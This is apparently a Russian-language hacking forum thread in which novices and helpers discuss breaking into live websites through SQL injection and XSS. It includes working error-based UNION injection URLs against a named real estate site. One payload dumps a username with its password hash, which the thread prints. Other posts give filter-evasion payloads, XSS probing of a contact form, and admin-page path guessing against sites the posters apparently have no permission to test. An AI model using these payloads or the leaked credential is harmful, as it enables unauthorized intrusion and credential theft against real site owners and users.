DrAssault, так я ж не прошу решить мою проблему за меня. Я и пытаюсь вникнуть и хочу чтобы кто либо дал мануал л том как раскрутить MSSQL-inj без подзапросов!
Какой мануал? Может кто-нибудь написал мануал по твоему случаю?! Дать тебе ссылку? А сам ты не в состоянии заюзать поиск по форуму? (поговаривают очень полезная вещь) Не поймёшь ты ничего таким образом, читай спецификации, а понимание придёт со временем, но это уже будет другое понимание, более глубокое и осмысленное...
Всетаки рекомендую начать с азов. Узнать какие SQL команды существуют (Select, Insert, Update), их синтаксис. В твоем случае это INSERT . Попробуй понять можно ли увидеть результаты того что ты вводишь. Если да, то определи список объектов в базе. Поняв как функционирует база ты сможешь провести атаку например используя несколько команд в одном запросе.
Вот хотел узнать... есть один сайт. не знаю почему, но мне кажется, что он не серьезно защищен, хотя вид деятельности серьезный. читал статьи по SQL inj, и по XSS, и пробовал там все это принять.. Не знаю это хорошо или плохо, но вот не понял на самом деле уязвимости есть или нет. на страинце обратный адрес была форма письмы, я там ставил на все поля Java код (из статьи по XSS) и он отправился! (написал, типа спасибо за заявку). А насчет SQL, ввел простые запросы, типа: site.com/index.php?id=1 и все они показывали главную страницу.. Еще что заметил, это просто так написал в конце адреса admin, и открылся сайт хостера(hoster.ru) а в середине написан "страница не найден". Какие выводы можно делать? Сильно не пинать, т.к. в этом деле очень и очень плохо разбираюсь пока. т.е. учусь )
Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина. Заранее всем спасибо. http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23&lang=en The used SELECT statements have a different number of columns
Здесь, все понятно, по не найденным страницам идет редирект на дефолтную (в данном случае на прова), так что диры с именем admin не существует. наверное javascript) и вообще зря отправлял, контролировать вывод ты не можешь, так как заявки просматривает токо админ и соответственно как фильтруется твой код понимания нет, отсюда и бесполезность атаки
FlaktW, выводи данные в ошибку, либо поищи скулю в другом параметре http://www.realtor.am/newbuilding.php?id=10'+union+select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x2F,username,password)+from+users+limit+0,1),14)d)+as+t+join+(select+name_const((select+concat_ws(0x2F,username,password)+from+users+limit+0,1),14)e)b)a--+ Duplicate column name 'anna/fe4127b4a905160580cca06279f92be7'
Проще говоря у тебя Blind sql-inj (слепая скуля) то есть sql-inj есть но без вывода https://forum.antichat.ru/thread104591.html Почитай эту тему для работы с ней
wolmer Нет, сюда не хочу )) моу в личку кинуть. Но мой цель не взломать его, а тренироватся, хочу сам понимать как все это работает. Можете помочь? mr.celt И что советуешь делать? какие трюки можно выполнить?
Если хочешь провернуть XSS, то необходимо найти параметры, вывод которых ты можешь видеть, например, то что вводишь в поиске.. Что касатся проверки путей и поиска админки, есть примерно 50 стандартных путей (файлик могу скинуть), вот их и проверяй, если конечно нет какого-либо префикса перед названием. HAXTA4OK Как это слепая? А вывод сообщения "The used SELECT statements have a different number of columns".
а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке
mr.celt а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница? Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
пробуй: id=-1/**/unION/**/selECT/**/1,2,3--+ И вообще, читай больше инфи --- ксс может быть не только в поиске..
если пробовать вот так: http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+ то открывает гравная страница (ничем не отличается от www.site.ru) А если просто вот так: http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+ то кидает в сайт хостера, с надпесем: Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
блин, я даже не знаю как тебе объяснить 1) очень быстро перешел на такий сайты 2) читай мануалы! Тебе в этой теме уже рассказали что читать и делать!